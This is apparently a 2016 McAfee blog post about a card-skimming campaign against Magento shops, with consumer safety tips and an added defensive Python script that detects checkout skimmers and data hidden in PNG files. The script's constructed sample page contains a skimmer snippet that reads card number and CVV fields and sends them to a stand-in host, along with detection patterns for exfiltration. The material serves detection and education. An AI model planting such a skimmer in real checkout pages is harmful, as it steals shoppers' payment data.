Leading E-Commerce Platform Magento Cracked by Cybercriminals

By Gary Davis on Oct 20, 2016

There’s a modern joy we’re all too familiar with. We’ve all made an online purchase while reclining in pajamas, computer on our lap. Everyone knows the comfort of simply punching credit card numbers into a website for a new item. That’s what we do for Converse shoes, Audi accessories, and even donations to political parties. But one dark element turns convenience into fear. Such transactions also attract the buzz of cybercriminals. Just recently, roughly 6,000 online shops — including those mentioned above, as well as the National Republican Senatorial Committee — have had user payment details stolen.

Such a large attack isn’t easy to pull off. To do so, perpetrators targeted something many e-commerce websites have in common: Magento. Don’t worry if you haven’t heard that name before. Simply put, Magento is an open-source e-commerce platform that many online stores are built on. Think of it this way: fashion designers or politicians may be experts in clothing trends or policy-making, but they’re not familiar with the technical aspects of online selling. By using Magento, they can build a storefront, manage orders, and analyze business data without writing the shop software themselves.

Now, here’s what’s crucial. Magento runs the storefront, including the checkout pages where shoppers type in their card details, on around 250,000 websites. That’s exactly what cybercriminals are after: one piece of software whose weaknesses can be exploited across thousands of shops at once.

Cyber crooks, over the past six months, have been siphoning card numbers from websites that run Magento. And these aren’t your run-of-the-mill attacks. Rather than breaking into a company’s database after the fact, they planted malicious code on the shops’ checkout pages. That code copies the card number, expiry date and security code at the moment you submit the order, while the real purchase goes through as normal, and forwards them to a server the criminals control. From there, the details end up on an illicit underground market. To disguise their efforts further, the perpetrators even used steganography, hiding the stolen data inside image files on the compromised shops, so that security teams looking through the server would see nothing but pictures. All in all, these sophisticated actions made a recipe for many stolen cards.
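To make the two tricks in that paragraph concrete for readers who run a shop, here is an added example of how a defender might look for them. It is not code from McAfee, from Magento or from the criminals, and the sample checkout page and PNG image are constructed inline so it runs offline. The first check flags inline scripts that both touch card fields and send data to a host other than the shop; the second walks a PNG’s chunk list and reports anything appended after the final IEND chunk, one simple way an image file can be turned into a drop file. Both are heuristics for illustration, not a reproduction of the exact skimmer used in 2016.

```python
"""Two defensive checks for the skimming tricks described above (added example,
not code from the original post). Sample HTML and PNG bytes are constructed
here so the script runs offline."""
import re
import struct
import zlib
from urllib.parse import urlparse

# Field names a skimmer has to read to capture a card. Heuristic, not a spec.
CARD_FIELD_RE = re.compile(r"cc_number|card[_-]?number|cvv|cc_cid|expir", re.I)
# Ways a script can ship data out of the page.
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|\.src\s*=|sendBeacon|new Image", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)


def suspicious_scripts(html, shop_host):
    """Return (snippet, foreign_hosts) for each inline script that reads card
    fields AND references a host other than the shop itself."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        if not (CARD_FIELD_RE.search(body) and EXFIL_RE.search(body)):
            continue
        hosts = {urlparse(u).hostname for u in URL_RE.findall(body)}
        foreign = sorted(h for h in hosts if h and h != shop_host)
        if foreign:
            findings.append((body.strip()[:60], foreign))
    return findings


# Constructed checkout page: one legitimate validator, one skimmer.
SAMPLE_HTML = """
<form id="checkout">
  <input name="payment[cc_number]"><input name="payment[cc_cid]">
</form>
<script>
  // legitimate client-side check: touches card fields, sends nothing away
  function validate(f){ return /^\\d{13,19}$/.test(f['payment[cc_number]'].value); }
</script>
<script>
  // constructed skimmer: reads the fields and leaks them via an image request
  document.getElementById('checkout').addEventListener('submit', function(){
    var d = document.forms[0]['payment[cc_number]'].value + '|' +
            document.forms[0]['payment[cc_cid]'].value;
    (new Image()).src = 'https://stats-collector.example/i.gif?d=' + btoa(d);
  });
</script>
"""

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, payload):
    """Encode one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_png(trailer=b""):
    """A valid 1x1 grayscale PNG, optionally with bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailer


def png_trailing_bytes(data):
    """Walk the chunk list and return whatever follows IEND (should be b'')."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # header + data + CRC
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("truncated PNG: no IEND chunk")


if __name__ == "__main__":
    for snippet, hosts in suspicious_scripts(SAMPLE_HTML, "shop.example"):
        print("suspicious script ->", hosts, ":", snippet)
    # Visa test number, constructed record, not real card data.
    tampered = build_png(b"4111111111111111|12/19|123\n")
    print("bytes hidden after IEND:", png_trailing_bytes(tampered))
    print("clean image trailer:", png_trailing_bytes(build_png()))
```

The script check is deliberately narrow: a real audit would also diff the shop’s JavaScript against a known-good copy and watch outbound requests from the checkout page, since a skimmer can be hidden in an external file or obfuscated so that no card field name appears in the text. The PNG check generalises to JPEG (data after the FFD9 end-of-image marker) and is cheap enough to run over a whole media directory.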

To put this into perspective, big names such as Audi, Converse, and the National Republican Senatorial Committee were all among the roughly 6,000 affected websites. To be clear, the victims were running out-of-date versions of Magento or had not patched and hardened their installations, which is what let the criminals plant their code in the first place. But the attack still highlights the risk of buying things online from shops that don’t keep their platform up to date. With global e-commerce accounting for $1.915 trillion this year, and projected to reach $4 trillion by 2020, we’re not likely to see the end of such attacks anytime soon.

And let’s be honest. Nobody is likely to head to a brick-and-mortar shop for every single purchase, in this digital day and age. Unless we get thrown into a time machine, the comfort and convenience of clicking away in our pajamas is simply too irresistible. So it’s not a matter of avoiding online shopping, but doing so safely.

The good news? That’s possible. Here are a couple of tips to keep in mind for your next online purchase:

  • Check for a secure connection. Do you see “https” instead of “http” in the web address? That “s” stands for secure: it means your card details are encrypted on the way to the shop, so nobody eavesdropping on the network can read them. Never enter payment information on a plain “http” page. Be aware of what it does not mean, though. HTTPS doesn’t prove a site is legitimate, and it does nothing against code that the criminals have planted on the page itself, which is exactly how the Magento skimmers worked on perfectly encrypted checkouts. So treat it as the bare minimum, not a guarantee.
  • Make sure your credit card has fraud protection. When cybercriminals steal your card’s digits, you shouldn’t have to pay for their lunch. When shopping online, make sure to use a card that won’t leave you with the bill if fraud occurs. As a best practice, also be sure to check your statements regularly, and flag any suspicious activity on your card to your bank.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee on Twitter, and ‘Like’ us on Facebook.


About the Author

Gary Davis

Gary Davis was previously McAfee's Consumer Security Evangelist providing security education and advice to businesses and consumers. He is a sought-after speaker on trends in digital security, appearing at conferences and events, as well as security and consumer lifestyle broadcast outlets and publications such as ABC, NBC, FOX, the Wall Street Journal, USA Today, Money ...
